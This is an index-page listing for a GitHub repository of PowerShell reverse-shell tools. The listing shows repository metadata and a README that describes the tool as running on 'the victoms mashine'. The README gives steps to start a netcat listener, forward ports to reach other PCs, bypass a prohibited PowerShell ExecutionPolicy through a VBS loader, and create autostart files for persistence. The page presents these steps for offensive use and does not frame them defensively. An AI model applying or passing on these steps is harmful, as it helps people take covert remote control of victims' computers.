Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/UltraAlex00/reverseshell-tools
Reverse Shell with some custom commands made in Powershell
https://github.com/UltraAlex00/reverseshell-tools
download-files powershell powershell-script reverse-shell upload-files
Last synced: 3 months ago
JSON representation
Reverse Shell with some custom commands made in Powershell
- Host: GitHub
- URL: https://github.com/UltraAlex00/reverseshell-tools
- Owner: UltraAlex00
- Created: 2023-02-25T23:55:33.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-04-30T13:06:12.000Z (over 1 year ago)
- Last Synced: 2024-05-12T03:33:03.827Z (6 months ago)
- Topics: download-files, powershell, powershell-script, reverse-shell, upload-files
- Language: PowerShell
- Homepage:
- Size: 76.2 KB
- Stars: 2
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- jimsghstars - UltraAlex00/reverseshell-tools - Reverse Shell with some custom commands made in Powershell (PowerShell)
README
# Reverse Shell Tools
A simple tool to start a TCP reverse shell on the victoms mashine and run some pre-build commands.
# Manual Install1. Start a Listener Server (netcat: nc.exe -lp [port]) ; if you want tartget other pc's you need to forward your port
2. Start active.ps1 using powershell (if ExecutionPolicy is prohibited: edit the loader.vbs and change the 0 to 1 and run loader.vbs instead)
3. If you starting this script for the first time, it will ask you for the listener ip and port, so enter it (will be saved in listener.txt)
4. [?] Change the 1 back to 0 (there is no problem changing it while the script is beeing executed)
5. The Script should be now connected to the listener, type "/restart" to create the autostart files
6. [?] Type "/help" for further instruction